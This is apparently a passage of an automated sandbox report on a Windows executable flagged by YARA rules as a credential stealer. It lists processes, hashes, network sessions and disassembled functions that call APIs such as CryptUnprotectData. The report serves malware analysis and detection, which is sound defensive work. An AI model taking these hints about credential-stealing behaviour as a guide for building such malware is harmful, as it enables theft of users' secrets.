ccz/7JtuRKWOzMHlIwz5bARsyVpdO8F7a/BpEyb8OgKbSUhevDxnB6hLhqIgqTuZxp/a2Q/Y4mg5E3oAFB8pZ1m6CYr+rLLj2K4nsqVe264iC4t5/jkDXTnTygT0O4glyW9dyhwpA6YrDjQn0B96PudP2gi+KNJJiOMM0dAKXGdZurm6+YgTI9zuA8NETtrPBq7vCH6Yxq6w==
2024-12-30 14:53:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49759	13.107.246.45	443	7048	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 14:53:47 UTC	549	OUT	GET /scripts/c/ms.jsll-4.min.js HTTP/1.1 Host: js.monitor.azure.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://learn.microsoft.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9

Target ID:	0
Start time:	09:52:56
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\UmotQ1qjLq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\UmotQ1qjLq.exe"
Imagebase:	0xb10000
File size:	2'993'664 bytes
MD5 hash:	0C317F381E79D53CF9CDFCE0497448C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2017227740.0000000001672000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1953190112.0000000001672000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2017085147.0000000001672000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1950540598.0000000001671000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:53:40
Start date:	30/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	09:53:41
Start date:	30/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1940,i,1303582193937569043,18141116409944036505,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	09:53:45
Start date:	30/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=UmotQ1qjLq.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:53:45
Start date:	30/12/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1976 --field-trial-handle=1920,i,10785265456503200477,11409985625348319753,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff76e190000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	1.3%
Signature Coverage:	70.9%
Total number of Nodes:	371
Total number of Limit Nodes:	30

Executed Functions

Function 00B48860 Relevance: 21.7, APIs: 5, Strings: 7, Instructions: 674
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(k2`0), ref: 00B48B61
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00B48B9D
SysFreeString.OLEAUT32(?), ref: 00B48EB3
SysFreeString.OLEAUT32(?), ref: 00B48EB9
GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00B48EFA

Strings

x;, xrefs: 00B48C34
S, xrefs: 00B48C24
k2`0, xrefs: 00B48B5B, 00B48B5F
,./,, xrefs: 00B48947
]E, xrefs: 00B48C2C
b>c<, xrefs: 00B48AFD
]E, xrefs: 00B49062

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: String$Free$AllocBlanketInformationProxyVolume
String ID: ,./,$S$]E$]E$b>c<$k2`0$x;
API String ID: 1773362589-4038474941
Opcode ID: dc3d3486f59dd0617aca7fb7844d8ac2e72e31d44751125c74c8215d3710ed37
Instruction ID: 8e7672c7a910a78952be940b28725edf265afa50e8ecbde9341aef09ff52ae6b
Opcode Fuzzy Hash: dc3d3486f59dd0617aca7fb7844d8ac2e72e31d44751125c74c8215d3710ed37
Instruction Fuzzy Hash: DC2210B66483019BD310DF28C881B6FBBE5FFC5314F18896DE5949B2A0DB75D906CB82

Function 00B29362 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 390
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B4D910: LdrInitializeThunk.NTDLL(00B1D0E7,00000002,00000004,?), ref: 00B4D93E

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B297EB

Strings

#1!%, xrefs: 00B29539
'>0=, xrefs: 00B2952E
?7?0, xrefs: 00B2950D
D$p, xrefs: 00B295C2
x">*, xrefs: 00B29430
14'", xrefs: 00B29470
-&64, xrefs: 00B29544
e, xrefs: 00B2955A
*8$), xrefs: 00B29523

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: CryptDataInitializeThunkUnprotect
String ID: #1!%$'>0=$*8$)$-&64$14'"$?7?0$e$x">*$D$p
API String ID: 279577407-4262920783
Opcode ID: 81e719aa5bd5345ac07c47f8adc36f2f4a0e569632d66b5c86f8ab83ff8f453f
Instruction ID: 022794f0adab988d71287f8791bba0f3e43eaf017131bd0f35dfad8dcec1c6be
Opcode Fuzzy Hash: 81e719aa5bd5345ac07c47f8adc36f2f4a0e569632d66b5c86f8ab83ff8f453f
Instruction Fuzzy Hash: 23C1F7B2A083918BD729DF28D8917AFB7E2AFD5300F198A7CD4DD87251DB349845CB42

Function 00B1AD90 Relevance: 15.5, Strings: 12, Instructions: 485
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?=, xrefs: 00B1B4AD
7V>T, xrefs: 00B1B037
^*^(, xrefs: 00B1AFDD
n^d\, xrefs: 00B1B04B
'J*H, xrefs: 00B1B02D
:8, xrefs: 00B1B005
cfgd, xrefs: 00B1B05F
I.Q,, xrefs: 00B1AFD3
uBc@, xrefs: 00B1B019
FuD, xrefs: 00B1B00F
oZdX, xrefs: 00B1B055
fRnP, xrefs: 00B1B041

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: FuD$:8$'J*H$7V>T$?=$I.Q,$^*^($cfgd$fRnP$n^d\$oZdX$uBc@
API String ID: 0-3876044058
Opcode ID: 3d9f9062123472eaf6689d5102b0def1245eea4c5319cbab3a4d19d448f5cfe4
Instruction ID: 77f13e5725f48ce2ccc997bd8ccb39bc19095ce0943d9b7f85383537f983febc
Opcode Fuzzy Hash: 3d9f9062123472eaf6689d5102b0def1245eea4c5319cbab3a4d19d448f5cfe4
Instruction Fuzzy Hash: E20299B1200B01CFD3348F69D891B97BBF5FB49315F448A6CE1AA8BAA0DB75A405CF51

Function 00B31060 Relevance: 14.3, Strings: 11, Instructions: 575
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1, xrefs: 00B31344
@, xrefs: 00B31335
,, xrefs: 00B31635
0, xrefs: 00B3133F
?, xrefs: 00B3133A
B, xrefs: 00B3132B
!@, xrefs: 00B31096
=, xrefs: 00B31330
V, xrefs: 00B312B8
T, xrefs: 00B312C2
W, xrefs: 00B312BD

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
